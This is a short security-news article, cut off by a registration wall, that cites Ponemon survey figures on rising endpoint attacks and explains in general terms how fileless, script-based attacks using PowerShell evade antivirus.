6 ways malware can bypass endpoint protection

Breaches from attacks that defeat or run around endpoint protection measures are on the rise. Here's how attackers do it.

Sixty-three percent of IT security professionals say the frequency of attacks has gone up over the past 12 months, according to Ponemon's 2018 State of Endpoint Security Risk report — and 52% of respondents say all attacks cannot be realistically stopped. Their antivirus solutions are blocking only 43% of attacks. Sixty-four percent of respondents said that their organizations had experienced one or more endpoint attacks that resulted in a data breach.

The report, which was based on a survey of 660 IT security professionals, showed that most (70%) said that new and unknown threats to their organizations have increased, while the cost of a successful attack has increased from an average of $5 million to $7.1 million.

However, nearly every computer has some form of protection built in. So why are the attackers still getting through? These are the top methods attackers use to bypass endpoint protection security.

1. Script-based attacks

In a script-based or "fileless" attack, the malware is actually a script that runs in an existing, legitimate application to leverage PowerShell or use other already-installed Windows components. There's no new software being installed, so many traditional defenses are bypassed.

According to Ponemon, these kinds of attacks are significantly more likely to result in a successful breach, and they're going up, from 30% of all attacks in 2017 to 35% last year. "There would be very few artifacts — for example no actual malware binary to scan," says Jérôme Segura, senior security researcher at Malwarebytes.

To continue reading this article register now

Get the best of CSO ... delivered. Sign up for our FREE email newsletters!